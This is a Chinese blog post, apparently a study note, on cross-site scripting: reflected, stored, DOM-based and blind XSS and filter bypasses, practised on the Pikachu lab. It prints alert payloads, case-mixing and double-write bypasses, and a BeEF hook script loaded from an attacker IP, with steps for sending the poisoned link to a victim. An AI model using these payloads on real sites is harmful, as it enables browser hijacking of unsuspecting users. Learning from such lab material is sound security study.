
<!DOCTYPE html>
<html lang="zh ">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>FHK_KMD终晨 || _coding_</title>
    <meta name="author" content="FHK_KMD6377">
    <meta name="description" content="所有所得所获,不如一夜星空 ------<<三体导读>> ">
    <meta name="keywords" content=" ">
    <link rel="icon" href="/images/avatar.png">
    <link rel="stylesheet" href="/css/antd.min.css">
    
    <link rel="stylesheet" href="/css/full-theme.css">
    
    <script src="/js/vue.js"></script>
    <script src="/js/antd.min.js"></script>
<meta name="generator" content="Hexo 6.3.0"></head>

<body>

    <div id="loading"
        style="height: 100vh; width: 100%; position: fixed;display: flex;z-index: 200; justify-content: space-between;">
        <div id="loadleft" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div id="loadright" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div
            style="position: fixed; height: 100vh; width: 100%;display: flex;justify-content: center;align-items: center;">
            <div id="loadcontent"
                style="width:400px;height:400px;padding:50px;border-radius:50%;display:flex;justify-content:center;align-items:center;border:solid 10px#a3ddfb; text-align:center;opacity:1;transition:opacity 0.3s ease-out;">
                <div>
                    <h2>LOADING...</h2>
                    <p>加载过慢请开启缓存(浏览器默认开启)</p>
                    <div>
                        <img src="/dancingkitty.gif" alt="loading">
                    </div>
                </div>
            </div>
        </div>
    </div>

    <div id="layout">
        <transition name="into">
            <div v-show="show_page" style="display: none;">
                <div id="menu_show">
                     
<nav id="menu">
    <div class="desktop-menu">
        <a href="/">
            <span class="title">FHK_KMD终晨</span>
        </a>
        
        <a href="/">
            <span>
                <a-icon type="home" theme="filled" />
            </span>
            <span>home</span>
        </a>
        
        <a href="/about">
            <span>
                <a-icon type="idcard" theme="filled" />
            </span>
            <span>about</span>
        </a>
        
        <a href="/archives">
            <span>
                <a-icon type="folder" theme="filled" />
            </span>
            <span>archives</span>
        </a>
        
        <a href="/like/categories">
            <span>
                <a-icon type="book" theme="filled" />
            </span>
            <span>categories</span>
        </a>
        
        <a href="/like/tags">
            <span>
                <a-icon type="tags" theme="filled" />
            </span>
            <span>tags</span>
        </a>
        
        <a target="_blank" rel="noopener" href="https://en.korilin.com">
            <span>
                <a-icon type="compass" theme="filled" />
            </span>
            <span>英文博客</span>
        </a>
        
    </div>

    <div :class="'phone-menu ' + menu_show" id="phone-menu">
        <div :class="'title'" @click="menu_show=!menu_show">
            <span style="margin-right: 10px;">
                <a-icon type="appstore" theme="filled" />
            </span>
            <span>FHK_KMD终晨</span>
        </div>
        <div class="items" v-show="menu_show">
            
            <a href="/">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="home" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">home</div>
                </div>
            </a>
            
            <a href="/about">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="idcard" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">about</div>
                </div>
            </a>
            
            <a href="/archives">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="folder" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">archives</div>
                </div>
            </a>
            
            <a href="/like/categories">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="book" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">categories</div>
                </div>
            </a>
            
            <a href="/like/tags">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="tags" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">tags</div>
                </div>
            </a>
            
            <a target="_blank" rel="noopener" href="https://en.korilin.com">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="compass" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">英文博客</div>
                </div>
            </a>
            
        </div>
        <div class="curtain" v-show="menu_show"></div>
    </div>

</nav>
                </div>

                <div id="main">
                     
<link rel="stylesheet" href="/css/post-body.css">
<div class="article">
    <div>
        <h1> </h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <a-icon type="calendar" theme="filled" />
            </span>
            2024/9/23
        </span>

        

        
    </div>

    <div class="content" v-pre>
        <h2 id="漏洞-XSS"><a href="#漏洞-XSS" class="headerlink" title="漏洞-XSS"></a>漏洞-XSS</h2><p>Cross-Site Scripting 简称为“CSS”，为避免与前端叠成样式表的缩写”CSS”冲突，故又称XSS。一般XSS可以分为如下几种常见类型：<br>    1.反射性XSS;  &#x3D;&gt; 交互的数据一般不会被存在数据库中,恶意脚本请求中传入,服务器响应中返回,所见即所得,一次性<br>    2.存储型XSS;  &#x3D;&gt; 交互的数据存在数据库中,永久性存储,比如一些留言板,评论<br>    3.DOM型XSS; &#x3D;&gt; 不与后端服务器产生数据交互,是一种通过DOM操作前端数据输出的时候产生的问题</p>
<p>XSS是一种发生在前端浏览器端的漏洞，所以其危害的对象也是前端用户<br>形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理，导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。<br>简单来讲就是在浏览器里面输入<code>&lt;script&gt;xxxx&lt;\script&gt;</code>脚本块,被当成js代码执行了</p>
<h3 id="反射型XSS"><a href="#反射型XSS" class="headerlink" title="反射型XSS"></a>反射型XSS</h3><p><img src="/attachment/Pasted%20image%2020240224123110.png"><br>如图所示,输入的内容会显示在下面,如果在里面输入<code>&lt;script&gt;alert(1)&lt;/script&gt;</code>,那么就会执行alert(1)<br>假如此时输入框做了输入长度的限制,那么可以在url参数中写,绕过限制</p>
<h4 id="get类型"><a href="#get类型" class="headerlink" title="get类型"></a>get类型</h4><p>浏览器的输入通过get传递给后端,再由后端传回来显示在浏览器上.<br>这时攻击者C启动beef-xss,先模拟用户登录网站,在输入框输入hook代码<code>&lt;script src=&quot;http://&lt;C的ip&gt;:3000/hook.js&quot;&gt;&lt;/script&gt;</code>,再到beef的webUI界面<a target="_blank" rel="noopener" href="http://127.0.0.1:3000/ui/panel%E6%A3%80%E6%9F%A5%E6%98%AF%E5%90%A6%E6%88%90%E5%8A%9F,%E5%A6%82%E6%9E%9C%E6%88%90%E5%8A%9F,%E9%82%A3%E4%B9%88%E5%B0%B1%E6%8A%8A%E6%AD%A4%E6%97%B6%E7%9A%84url(%E6%90%BA%E5%B8%A6%E6%9C%89%E7%94%A8%E6%88%B7%E4%BB%A3%E7%A0%81)%E5%8F%91%E9%80%81%E7%BB%99%E5%8F%97%E5%AE%B3%E8%80%85,%E5%8F%97%E5%AE%B3%E8%80%85%E7%82%B9%E5%87%BB%E8%BF%9E%E6%8E%A5,%E6%B5%8F%E8%A7%88%E5%99%A8%E7%9A%84%E4%BF%A1%E6%81%AF%E5%B0%B1%E8%A2%AB%E5%8A%AB%E6%8C%81%E4%BA%86">http://127.0.0.1:3000/ui/panel检查是否成功,如果成功,那么就把此时的url(携带有用户代码)发送给受害者,受害者点击连接,浏览器的信息就被劫持了</a></p>
<h4 id="post类型"><a href="#post类型" class="headerlink" title="post类型"></a>post类型</h4><p>浏览器的输入通过post传递给后端,输入的内容不会被显示在url中,此时可以抓包,在参数那里写<code>&lt;script&gt;xxxx&lt;\script&gt;</code>代码</p>
<h3 id="存储型XSS"><a href="#存储型XSS" class="headerlink" title="存储型XSS"></a>存储型XSS</h3><p>这个就是你存进去之后别人访问到这个页面也会有这个效果</p>
<h3 id="DOM型XSS"><a href="#DOM型XSS" class="headerlink" title="DOM型XSS"></a>DOM型XSS</h3><p>DOM型XSS不同之处在于DOM型XSS一般和服务器的解析响应没有直接关系，而是在JavaScript脚本动态执行的过程中产生的。<br>例如</p>
<pre><code>&lt;html&gt;
&lt;head&gt;
&lt;title&gt;DOM Based XSS Demo&lt;/title&gt;
&lt;script&gt;
function xsstest()
&#123;
    var str = document.getElementById(&quot;input&quot;).value;
    document.getElementById(&quot;output&quot;).innerHTML = &quot;&lt;img src=&#39;&quot;+str+&quot;&#39;&gt;&lt;/img&gt;&quot;;
&#125;
&lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;div id=&quot;output&quot;&gt;&lt;/div&gt;
&lt;input type=&quot;text&quot; id=&quot;input&quot; size=50 value=&quot;&quot; /&gt;
&lt;input type=&quot;button&quot; value=&quot;submit&quot; onclick=&quot;xsstest()&quot; /&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre>
<p>输入 <code>x&#39; onerror=&#39;javascript:alert(/xss/)</code> 即可触发。</p>
<h2 id="XSS盲打"><a href="#XSS盲打" class="headerlink" title="XSS盲打"></a>XSS盲打</h2><p>xss盲打并不是xss漏洞的一种类型，而是xss漏洞的一个应用场景，主要是针对网站的后台管理员。<br>打开pukachu的xss盲打在输入框累随意输入一些字符点击提交，我们可以发现输入的结果并没有显示在前端，而是直接提交到后端管理员页面。<br> 如果我们输入一段js代码，由于是直接提交到后端管理员页面，用户前端并不会执行。<br> <img src="/attachment/Pasted%20image%2020240308091004.png"><br><img src="/attachment/Pasted%20image%2020240308091013.png"><br>我们在输入框输入<code>&lt;script&gt;alert(&#39;6666&#39;)&lt;/script&gt;</code>,然后提交，再点右上角的提示登入pikachuxss盲打的管理员后台；<br>我们会发现弹出了弹窗，说明我们盲打成功；xss盲打其实是一种尝试性的攻击行为，因为攻击者并不知道后台有没有输出或者是过滤；<br>xss盲打本质还是存储型xss漏洞的利用只不是后台输出端由用户变成了网站管理员，但是危害性就更大了。</p>
<h3 id="XSS绕过"><a href="#XSS绕过" class="headerlink" title="XSS绕过"></a>XSS绕过</h3><p>xss绕过-过滤-转换</p>
<p>例子：<br>1.前端限制绕过，直接抓包重放，或者修改html前端代码。比如反射型XSS(get)中限制输入20个字符。所以安全措施尽量不要放在前端。<br>2.大小写，比如<code>&lt;SCRIPT&gt;aLeRT(111)&lt;/sCRIpt&gt;</code>。如果过滤措施只对小写做了处理，我们就可以通过大写的输入来绕过他的措施，大写的输入被输出前端时仍然会被正常的执行。<br>3.双写（拼凑），<code>&lt;scri&lt;script&gt;pt&gt;alert(111)&lt;/scri&lt;/script&gt;pt&gt;</code>。会去除敏感标签如<code>&lt;script&gt;</code>但可能只会去除一次<br>4.注释干扰，<code>&lt;scri&lt;!--test--&gt;pt&gt;alert(111)&lt;/sc&lt;!--test--&gt;ript&gt;。在前端输出时注释是不会被执行的</code><br>xss绕过-过滤-编码</p>
<p>后台过滤了特殊字符，比如<code>&lt;script&gt;</code>标签，但该标签可以被各种编码，后台不一定会过滤，当浏览器对该标签进行识别时，会翻译成正常的标签，从而执行。（ps：使用编码要注意编码在输出点是否会被正常识别和翻译）</p>
<p>实验演示：</p>
<p>打开pikachu的xss之过滤，输入<code>&lt;script&gt;alert(1)&lt;/script&gt;</code>点提交</p>
<p><a target="_blank" rel="noopener" href="https://img2020.cnblogs.com/blog/2054866/202007/2054866-20200716162302697-1539471751.png"><img src="https://img2020.cnblogs.com/blog/2054866/202007/2054866-20200716162302697-1539471751.png"></a></p>
<p>没有弹窗弹出</p>
<p><a target="_blank" rel="noopener" href="https://img2020.cnblogs.com/blog/2054866/202007/2054866-20200716162353375-6208091.png"><img src="https://img2020.cnblogs.com/blog/2054866/202007/2054866-20200716162353375-6208091.png"></a></p>
<p> 接着我们查看页面源码</p>
<p><a target="_blank" rel="noopener" href="https://img2020.cnblogs.com/blog/2054866/202007/2054866-20200716162613302-1868779407.png"><img src="https://img2020.cnblogs.com/blog/2054866/202007/2054866-20200716162613302-1868779407.png"></a></p>
<p> 可以看到我们输入的标签都被去掉了，说明后台有对<code>&lt;script&gt;</code>标签进行过滤</p>
<p>接下来我们使用大小写混合的方法输入<code>&lt;SCrIPT&gt;alert(1)&lt;/ScRiPt&gt;</code></p>
<p><a target="_blank" rel="noopener" href="https://img2020.cnblogs.com/blog/2054866/202007/2054866-20200716162745829-1171243701.png"><img src="https://img2020.cnblogs.com/blog/2054866/202007/2054866-20200716162745829-1171243701.png"></a></p>
<p> 成功弹窗，说明我们成功绕过了过滤，他的过滤措施并没有对大小写过滤。</p>

    </div>

    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">
    <div id="comment">
        <div id="gitalk-container">
        </div>
    </div>
    
</div>
                     
<footer id="footer">
    <div class="footer-wrap">
        <div>
            © FHK新行星纪元637年 - 2024 FHK_KMD终晨
            <span class="footer-icon">
                <a-icon type="flag" theme="filled" /></span>
            @FHK_KMD6377
        </div>
        <div></div>
        <div>Based on the <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo Engine</a> & <a
                target="_blank" rel="noopener" href="https://github.com/korilin/hexo-theme-particle">Particle Theme</a></div>
        
    </div>

</footer>

<script src="/js/highlight.min.js"></script>
<script src="/js/particle.js"></script>
                </div>
            </div>
        </transition>
    </div>

    <script>
    new Vue({
        el: "#layout",
        data: {
            show_page: false,
            onload_menu: false,
            menu_show: false,
            card_top: 100
        },
        created: function () {
            var that = this
            window.onload = function () {
                that.show_page = true
                document.getElementById("loadcontent").style.opacity = 0
                setTimeout(function () {
                    document.getElementById("loadleft").style.width = 0
                    document.getElementById("loadright").style.width = 0
                }, 300)
                setTimeout(function () {
                    document.getElementById("loading").style = "display:none"
                }, 600)
            }
        },
        mounted: function () {
            var that = this
            window.addEventListener('scroll', function (e) {
                that.menu_show = false
            })
        },
        methods: {
            home_click: function () {
                window.scrollTo({
                    top: window.innerHeight - 80,
                    behavior: "smooth",
                });
            }
        }
    })
</script>

<script src="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>
<script>
    const gitalk = new Gitalk({
        clientID: '',
        clientSecret: '',
        repo: 'hexo-theme-particle',      // The repository of store comments,
        owner: 'korilin',
        admin: ['korilin'],
        language: 'en',
        id: location.pathname,      // Ensure uniqueness and length less than 50
        distractionFreeMode: true  // Facebook-like distraction free mode
    })
    gitalk.render('gitalk-container')
</script>

</body>

</html>